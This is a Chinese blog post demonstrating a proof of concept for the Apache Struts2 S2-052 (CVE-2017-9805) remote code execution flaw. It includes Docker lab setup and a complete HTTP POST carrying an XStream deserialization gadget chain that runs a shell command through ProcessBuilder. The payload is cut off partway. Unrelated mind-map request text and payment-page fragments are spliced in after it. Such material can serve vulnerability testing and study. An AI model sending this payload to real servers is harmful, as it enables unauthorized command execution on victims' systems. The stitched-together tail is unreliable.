S2-052(CVE-2017-9805)

本文介绍S2-052(CVE-2017-9805)远程代码执行漏洞的POC利用方法,适用于Struts2.1.2至Struts2.3.33及Struts2.5至Struts2.5.12版本。文章提供了测试环境搭建步骤,并展示了如何通过构造特定的XML请求来触发漏洞。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

S2-052(CVE-2017-9805)

struts2 052远程代码执行漏洞POC利用(影响版本:Struts 2.1.2 - Struts 2.3.33, Struts 2.5 - Struts 2.5.12) 官方介绍:https://cwiki.apache.org/confluence/display/WW/S2-052 此POC是在struts-2.5.12版本测试验证的。

测试环境搭建

├── docker-compose.yml
├── Dockerfile
├── poc.txt
├── README.md
└── S2-052.war

docker-compose build
docker-compose up -d

Dockerfile

FROM kk98kk0/tomcat:9.0

MAINTAINER phithon <root@leavesongs.com>(借鉴leavesongs.comDocker配置)

RUN set -ex \
    && rm -rf /usr/local/tomcat/webapps/* \
    && chmod a+x /usr/local/tomcat/bin/*.sh

COPY S2-052.war /usr/local/tomcat/webapps/ROOT.war
EXPOSE 8080

docker-compose.yml

version: '2'
services:
 struts2:
   build: .
   ports:
    - "8080:8080"

POC

http://10.160.11.191:8080/orders.xhtml

burpsuite抓包:
进入到修改界面,点击”提交”抓包,然后修改Content-Type为application/xml格式,post数据替换为poc中data提交。
Notes:
Windows下关键字为:

calc
Mac下关键字为:

/Applications/Calculator.app/Contents/MacOS/Calculator

POC

POST /orders/3 HTTP/1.1
Host: 10.160.11.191:8080
Proxy-Connection: keep-alive
Content-Length: 2014
Cache-Control: max-age=0
Origin: http://10.160.11.191:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Content-Type: application/xml
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://10.160.11.191:8080/orders/3/edit
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: _gitlab_session=de4e739c66f5b892f6386a2d2689486b; JSESSIONID=10830E7168FBEAE80396A8E748587042

<map> 
    <entry> 
        <jdk.nashorn.internal.objects.NativeString>
            <flags>0</flags>
            <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
                <dataHandler>
                    <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
                        <is class="javax.crypto.CipherInputStream">
                            <cipher class="javax.crypto.NullCipher">
                                <initialized>false</initialized>
                                <opmode>0</opmode>
                                <serviceIterator class="javax.imageio.spi.FilterIterator">
                                    <iter class="javax.imageio.spi.FilterIterator">
                                        <iter class="java.util.Collections$EmptyIterator"/>
                                        <next class="java.lang.ProcessBuilder">
                                            <command>
                                                <string>ls</string>
                                            </command>
                                            <redirectErrorStream>false</redirectErrorStream>
                                        </next>
                                    </iter>
                                    <filter class="javax.imageio.ImageIO$ContainsFilter">
                                        <method>
                                            <class>java.lang.ProcessBuilder</class>
                                            <name>start</name>
                                            <parameter-types/>
                                        </method>
                                        <name>foo</name>
                                    </filter>
                                    <next class="string">foo</next>
                                </serviceIterator>
                                <lock/>
                            </cipher>
                            <input class="java.lang.ProcessBuilder$NullInputStream"/>
                            <ibuffer></ibuffer>
                            <done>false</done>
                            <ostart>0</ostart>
                            <ofinish>0</ofinish>
                            <closed>false</closed>
                        </is>
                        <consumed>false</consumed>
                    </dataSource>
                    <transferFlavors/>
                </dataHandler>
                <dataLen>0</dataLen>
            </value>
        </jdk.nashorn.internal.objects.NativeString>
        <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
    </entry>
    <entry>
        <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
        <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> 
    </entry> 
根据以下内容,帮我生成思维导图:Struts2框架漏洞触发路径分类 ├─ **一、OGNL表达式注入漏洞** │ ├─ 1. 请求参数直接注入 │ │ ├─ 案例:S2-001、S2-016 │ │ └─ 原理:参数值未经过滤直接解析为OGNL │ ├─ 2. HTTP请求头注入 │ │ ├─ 案例:S2-045(CVE-2017-5638) │ │ └─ 原理:Content-Type头被解析为表达式 │ ├─ 3. URL路径与命名空间注入 │ │ ├─ 案例:S2-057(CVE-2018-11776) │ │ └─ 原理:URL路径拼接至OGNL上下文 │ └─ 4. 模板引擎二次解析 │ ├─ 案例:S2-053(CVE-2017-12611) │ └─ 原理:Freemarker二次解析逃逸 │ ├─ **二、文件上传漏洞** │ ├─ 1. 恶意文件名/内容类型注入 │ │ ├─ 案例:S2-045、S2-046 │ │ └─ 原理:异常处理时解析表达式 │ └─ 2. 文件解析逻辑缺陷 │ ├─ 案例:S2-122 │ └─ 原理:元数据拼接至OGNL上下文 │ ├─ **三、组件依赖漏洞** │ ├─ 1. 反序列化漏洞 │ │ ├─ 案例:S2-052CVE-2017-9805) │ │ └─ 原理:XStream未限制反序列化类型 │ ├─ 2. 模板引擎集成缺陷 │ │ ├─ 案例:S2-053(CVE-2017-12611) │ │ └─ 原理:模板引擎强制解析输入 │ └─ 3. 插件功能滥用 │ ├─ 案例:S2-029 │ └─ 原理:Velocity标签属性注入 │ └─ **四、修复与防护建议** ├─ 1. OGNL防护:过滤特殊字符、禁用动态方法调用 ├─ 2. 文件上传修复:替换解析器、限制文件类型 └─ 3. 组件规避:移除冗余插件、配置反序列化白名单
最新发布
03-28
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值